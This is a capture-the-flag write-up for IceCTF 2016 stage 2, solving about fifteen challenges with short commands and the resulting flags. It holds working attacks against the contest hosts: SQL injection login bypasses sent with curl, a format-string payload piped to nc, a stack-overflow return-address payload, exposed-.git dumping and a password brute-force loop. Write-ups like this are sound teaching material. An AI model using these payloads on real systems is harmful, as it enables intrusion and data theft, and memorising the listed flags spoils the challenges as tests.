IceCTF 2016: stage2
Complacent
Solved by @tukejonny.
The SSL certificate has the flag.
$ curl -kv https://complacent.vuln.icec.tf/
* Trying 104.154.248.13...
* Connected to complacent.vuln.icec.tf (104.154.248.13) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 697 certificates in /etc/ssl/certs
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification SKIPPED
* server certificate status verification SKIPPED
* common name: complacent.icec.tf (does not match 'complacent.vuln.icec.tf')
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: C=IS,ST=Kingdom of IceCTF,L=IceCTF city,O=Secret IceCTF Buisness Corp,OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11},CN=complacent.icec.tf
* start date: Tue, 02 Aug 2016 19:59:11 GMT
* expire date: Thu, 09 Jul 2116 19:59:11 GMT
* issuer: C=IS,ST=Kingdom of IceCTF,L=IceCTF city,O=Secret IceCTF Buisness Corp,OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11},CN=complacent.icec.tf
* compression: NULL
* ALPN, server did not agree to a protocol
> GET / HTTP/1.1
> Host: complacent.vuln.icec.tf
> User-Agent: curl/7.47.0
> Accept: */*
>
...
Search
Solved by @tukejonny.
See the TXT record of DNS.
$ host -t txt search.icec.tf
search.icec.tf descriptive text "IceCTF{flag5_all_0v3r_the_Plac3}"
Hidden in Plain Sight
The flag is written on the .text
.
$ xxd plain_sight | grep 00000510 -A 4
00000510: ec0c 50e8 38fe ffff 83c4 10b0 49b0 63b0 ..P.8.......I.c.
00000520: 65b0 43b0 54b0 46b0 7bb0 6cb0 6fb0 6fb0 e.C.T.F.{.l.o.o.
00000530: 6bb0 5fb0 6db0 6fb0 6db0 5fb0 49b0 5fb0 k._.m.o.m._.I._.
00000540: 66b0 6fb0 75b0 6eb0 64b0 5fb0 69b0 74b0 f.o.u.n.d._.i.t.
00000550: 7dc7 45f4 0000 0000 eb2f 83ec 0c6a 01e8 }.E....../...j..
Toke
After logging in, the jwt_token
cookie is given.
RFC 7519 says that:
JSON Web Token (JWT) is a compact, URL-safe means of representing claims to be transferred between two parties.
You can decode this in some sites like http://jwt.calebb.net/, and get the flag.
Set-Cookie: jwt_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmbGFnIjoiSWNlQ1RGe2pXN190MEszbnNfNFJlX25PX3AxNENFX2ZPUl81M0NyRTdTfSIsInVzZXIiOiJob2dlIn0.aTmWNl_wEnIBZSOsYLn1X8NsDXI2Yr2A3LwFN_o_YzE; Path=/
payload:
{
"flag": "IceCTF{jW7_t0K3ns_4Re_nO_p14CE_fOR_53CrE7S}",
"user": "hoge"
}
Flag Storage
On your browser, since the username and passowrd are sent after base64, but you can use curl
to send SQLi directly.
$ curl http://flagstorage.vuln.icec.tf/login.php -F username="' or 1 = 1 -- " -F passowrd=password
...
<h1>Logged in!</h1><p>Your flag is: IceCTF{why_would_you_even_do_anything_client_side}</p>
...
RSA?
It is a trivial RSA. Due to $e = 1$, $c = m^e = m \pmod{n}$. i.e. the ciphertext $c$ is same to the plaintext $m$.
#!/usr/bin/env python3
n = 0x180be86dc898a3c3a710e52b31de460f8f350610bf63e6b2203c08fddad44601d96eb454a34dab7684589bc32b19eb27cffff8c07179e349ddb62898ae896f8c681796052ae1598bd41f35491175c9b60ae2260d0d4ebac05b4b6f2677a7609c2fe6194fe7b63841cec632e3a2f55d0cb09df08eacea34394ad473577dea5131552b0b30efac31c59087bfe603d2b13bed7d14967bfd489157aa01b14b4e1bd08d9b92ec0c319aeb8fedd535c56770aac95247d116d59cae2f99c3b51f43093fd39c10f93830c1ece75ee37e5fcdc5b174052eccadcadeda2f1b3a4a87184041d5c1a6a0b2eeaa3c3a1227bc27e130e67ac397b375ffe7c873e9b1c649812edcd
e = 0x1
c = 0x4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d
del n, e
import binascii
print(binascii.unhexlify(hex(c)[2:]).decode())
Demo
Only set the envvar.
[ctf-83264@icectf-shell-2016 /home/demo]$ env _=icesh ./demo
$ ls
Makefile demo demo.c flag.txt
$ cat flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
Thor’s a hacker now
Use xxd
and lzip
.
$ xxd -r thor.txt > thor.lz
$ lzip -dkc thor.lz > thor.jpg
$ open thor.jpg
IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}
Dear diary
Do format string attack.
The binary loads the flag into the static area at the head of main
. You can read this with %s
.
$ echo $'1\n\xa0\xa0\x04\x08%18$s\n2\n3\n' | nc diary.vuln.icec.tf 6501
IceCTF{this_thing_is_just_sitting_here}
Exposed
http://exposed.vuln.icec.tf/.git can be seen partially.
You cannot wget -r
directly, but you can download each file: .git/index
, .git/HEAD
and .git/objects/??/??????????????????????????????????????
.
At first, .git/HEAD
says:
$ curl http://exposed.vuln.icec.tf/.git/HEAD
ref: refs/heads/master
Then,
$ curl http://exposed.vuln.icec.tf/.git/refs/heads/master
1746e11be489319bd8900318874b68304eb05288
So,
$ curl -s http://exposed.vuln.icec.tf/.git/objects/17/46e11be489319bd8900318874b68304eb05288 | zlib-flate -uncompress
commit 222tree c2b90d32f2ab26ae53144285b05f5020fa320d9b
parent 6034c348380c9709715e6af60d04f684867d7234
author John C. Trevor Fields <john@icec.tf> 1470865669 +0000
committer IceCTF <icectf@icec.tf> 1470953038 +0000
add robots.txt
Next, parent: 6034c348380c9709715e6af60d04f684867d7234
or commit:
$ curl -s http://exposed.vuln.icec.tf/.git/objects/c2/b90d32f2ab26ae53144285b05f5020fa320d9b | zlib-flate -uncompress | xxd
00000000: 7472 6565 2031 3439 0031 3030 3634 3420 tree 149.100644
00000010: 2e67 6974 6967 6e6f 7265 0037 a843 79d9 .gitignore.7.Cy.
00000020: 2d21 3df0 f3e6 6964 0ed6 8b9e ddea 7d31 -!=...id......}1
00000030: 3030 3634 3420 666c 6167 2e70 6870 0027 00644 flag.php.'
00000040: 0e02 02d7 ef76 fdaf ceee eb10 b10d d762 .....v.........b
00000050: cd00 3b31 3030 3634 3420 696e 6465 782e ..;100644 index.
00000060: 7068 7000 8aa1 ee18 c010 18ed 1c8b b3f3 php.............
00000070: a437 ccb9 f84a 66ab 3130 3036 3434 2072 .7...Jf.100644 r
00000080: 6f62 6f74 732e 7478 7400 20c7 74a5 17f7 obots.txt. .t...
00000090: ee2d 7437 9ca2 3d80 c200 e887 eac3 .-t7..=.......
Therefore the files are:
.gitignore
:37a84379d92d213df0f3e669640ed68b9eddea7d
flag.php
:270e0202d7ef76fdafceeeeb10b10dd762cd003b
index.php
:8aa1ee18c01018ed1c8bb3f3a437ccb9f84a66ab
robots.txt
:20c774a517f7ee2d74379ca23d80c200e887eac3
Recursively doing this, you can get the flag: IceCTF{secure_y0ur_g1t_repos_pe0ple}
.
IRC II
Log in the glitch.is:6667
server and use features of the IceBot
.
It has flag
command, but you cannot use this simply.
/msg IceBot !flag
13:00 hoge !flag
13:00 IceBot KeyError: Identifier('hoge') (file "/usr/local/lib/python2.7/dist-packages/sopel/module.py", line 321, in guarded)
Read the specified code https://github.com/sopel-irc/sopel/blob/master/sopel/module.py#L321, it seems to require a privilege. So I tried to become a room admin. This is done by making a new room.
/join fuga
/invite IceBot
!flag
14:00 hoge !flag
14:00 IceBot IceCTF{H3Re_y0U_9O_M4s7Er_m4kE_5uR3_yOU_K33P_iT_54F3}
RSA
The private key info is given. Only compute $m = c^d \pmod{n}$.
#!/usr/bin/env python3
n = 0x1564aade6f1b9f169dcc94c9787411984cd3878bcd6236c5ce00b4aad6ca7cb0ca8a0334d9fe0726f8b057c4412cfbff75967a91a370a1c1bd185212d46b581676cf750c05bbd349d3586e78b33477a9254f6155576573911d2356931b98fe4fec387da3e9680053e95a4709934289dc0bc5cdc2aa97ce62a6ca6ba25fca6ae38c0b9b55c16be0982b596ef929b7c71da3783c1f20557e4803de7d2a91b5a6e85df64249f48b4cf32aec01c12d3e88e014579982ecd046042af370045f09678c9029f8fc38ebaea564c29115e19c7030f245ebb2130cbf9dc1c340e2cf17a625376ca52ad8163cfb2e33b6ecaf55353bc1ff19f8f4dc7551dc5ba36235af9758b
e = 0x10001
phi = 0x1564aade6f1b9f169dcc94c9787411984cd3878bcd6236c5ce00b4aad6ca7cb0ca8a0334d9fe0726f8b057c4412cfbff75967a91a370a1c1bd185212d46b581676cf750c05bbd349d3586e78b33477a9254f6155576573911d2356931b98fe4fec387da3e9680053e95a4709934289dc0bc5cdc2aa97ce62a6ca6ba25fca6ae366e86eed95d330ffad22705d24e20f9806ce501dda9768d860c8da465370fc70757227e729b9171b9402ead8275bf55d42000d51e16133fec3ba7393b1ced5024ab3e86b79b95ad061828861ebb71d35309559a179c6be8697f8a4f314c9e94c37cbbb46cef5879131958333897532fea4c4ecd24234d4260f54c4e37cb2db1a0
d = 0x12314d6d6327261ee18a7c6ce8562c304c05069bc8c8e0b34e0023a3b48cf5849278d3493aa86004b02fa6336b098a3330180b9b9655cdf927896b22402a18fae186828efac14368e0a5af2c4d992cb956d52e7c9899d9b16a0a07318aa28c8202ebf74c50ccf49a6733327dde111393611f915f1e1b82933a2ba164aff93ef4ab2ab64aacc2b0447d437032858f089bcc0ddeebc45c45f8dc357209a423cd49055752bfae278c93134777d6e181be22d4619ef226abb6bfcc4adec696cac131f5bd10c574fa3f543dd7f78aee1d0665992f28cdbcf55a48b32beb7a1c0fa8a9fc38f0c5c271e21b83031653d96d25348f8237b28642ceb69f0b0374413308481
c = 0x126c24e146ae36d203bef21fcd88fdeefff50375434f64052c5473ed2d5d2e7ac376707d76601840c6aa9af27df6845733b9e53982a8f8119c455c9c3d5df1488721194a8392b8a97ce6e783e4ca3b715918041465bb2132a1d22f5ae29dd2526093aa505fcb689d8df5780fa1748ea4d632caed82ca923758eb60c3947d2261c17f3a19d276c2054b6bf87dcd0c46acf79bff2947e1294a6131a7d8c786bed4a1c0b92a4dd457e54df577fb625ee394ea92b992a2c22e3603bf4568b53cceb451e5daca52c4e7bea7f20dd9075ccfd0af97f931c0703ba8d1a7e00bb010437bb4397ae802750875ae19297a7d8e1a0a367a2d6d9dd03a47d404b36d7defe8469
del e, phi
m = pow(c, d, n)
import binascii
print(binascii.unhexlify(hex(m)[2:]).decode())
Smashing Profit!
Send the addresses of the flag
function and rewrite the return address.
$ readelf -s profit | grep flag
72: 0804850b 83 FUNC GLOBAL DEFAULT 13 flag
$ perl -e 'print "\x0b\x85\x04\x08" x 24' | ./profit
Miners!
The source code is given as login.phps
.
It requires that the number of hit rows is just $1$.
So we don’t need to know any username
and password
, and union
shows the flag.
$ curl -s http://miners.vuln.icec.tf/login.php -F username="' union select 1,2,3 -- " -F password=foo
<h1>Logged in!</h1><p>Your flag is: IceCTF{the_miners_union_is_a_strong_one}</p>
Over the Hill
Decrypt as Hill cipher. I couldn’t find any good decrypter for this problem, so I write it: https://github.com/kmyk/hill-cipher-implementation.
$ python
>>> alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789_{}"
>>> matrix = [[54, 53, 28, 20, 54, 15, 12, 7],
... [32, 14, 24, 5, 63, 12, 50, 52],
... [63, 59, 40, 18, 55, 33, 17, 3],
... [63, 34, 5, 4, 56, 10, 53, 16],
... [35, 43, 45, 53, 12, 42, 35, 37],
... [20, 59, 42, 10, 46, 56, 12, 61],
... [26, 39, 27, 59, 44, 54, 23, 56],
... [32, 31, 56, 47, 31, 2, 29, 41]]
>>> ''.join([alphabet[i] for i in sum(matrix, [])])
32Cu3pmhGoyf}mY1}8Os4Hrd}Ife5k2qJRT2mQJLu8QkU5m_ANB8S3x5GF5VFcDP
$ ./hill.py -a 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789_{}' -k '32Cu3pmhGoyf}mY1}8Os4Hrd}Ife5k2qJRT2mQJLu8QkU5m_ANB8S3x5GF5VFcDP' decrypt '7Nv7}dI9hD9qGmP}CR_5wJDdkj4CKxd45rko1cj51DpHPnNDb__EXDotSRCP8ZCQ'
IceCTF{linear_algebra_plus_led_zeppelin_are_a_beautiful_m1xture}
Kitty
The hash value whose length is 64 is given.
The login form is like below, so it seems the password matchs [A-Z][a-z][0-9][0-9][\?%$@#\^\*\(\)\[\];:]
.
<form method="post" action="login.php">
<label for="username">Username: </label>
<input class="u-full-width" type="text" name="username" placeholder="Username" required minlength="5" />
<label for="password">Password: </label>
<input id="password" class="u-full-width" type="password" name="password" placeholder="Password" required pattern="[A-Z][a-z][0-9][0-9][\?%$@#\^\*\(\)\[\];:]" />
<input type="submit" value="Log In" />
</form>
So I wrote a very simple script, and wait for a while.
for a in {A..Z} ; do
for d in {a..z} ; do
for m in {0..9} ; do
for i in {0..9} ; do
for n in \? \% \$ \@ \# \^ \* \( \) \[ \] \; \: ; do
if diff <(echo -n $a$d$m$i$n | sha256sum | grep -o '\w*') <(echo c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a) >/dev/null ; then
echo $a$d$m$i$n
fi
done
done
done
done
done
shows Vo83*
, IceCTF{i_guess_hashing_isnt_everything_in_this_world}
.